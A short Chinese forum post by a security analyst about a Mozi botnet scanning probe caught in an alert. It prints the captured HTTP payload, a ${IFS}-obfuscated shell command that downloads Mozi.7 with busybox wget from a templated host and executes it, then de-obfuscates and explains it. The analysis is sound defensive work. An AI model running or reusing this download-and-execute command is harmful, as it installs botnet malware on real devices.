2021年8月Mozi作者就已经被帽子叔叔抓捕归案了，同年Mozi僵尸网络基本就销声匿迹了，今天告警巡检又抓到一个Mozi僵尸网络，是一个扫描探测，没有攻击成功。

ailx10

网络安全优秀回答者

网络安全硕士

去咨询

简单分析如下，HTTP请求内容包含如下内容：

/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}Mozi.7;${IFS}busybox${IFS}wget${IFS}http://%s:%d/Mozi.7;${IFS}chmod${IFS}777${IFS}Mozi.7;${IFS}./Mozi.7'

其中${IFS}是 shell 中的一个特殊变量，表示字段分隔符（Internal Field Separator）。在这段命令中，${IFS} 被用来表示空格符号。目的是为了确保在命令中的空格不被解释器当作参数的分隔符，而是作为参数的一部分。翻译翻译就是：

/bin/sh -c 'cd /tmp; rm -rf Mozi.7; busybox wget http://%s:%d/Mozi.7; chmod 777 Mozi.7; ./Mozi.7'

再来逐段翻译翻译就是：

/bin/sh -c 启动一个 shell 。它将执行以下操作：cd /tmp: 切换到 /tmp 目录。rm -rf Mozi.7: 递归地删除名为 Mozi.7 的文件。busybox wget http://%s:%d/Mozi.7: 使用 busybox wget 命令下载一个文件chmod 777 Mozi.7: 给 Mozi.7 文件设置可执行权限。./Mozi.7: 执行 Mozi.7 文件。

可惜了这里没有捕获到Mozi.7样本，继续蹲它～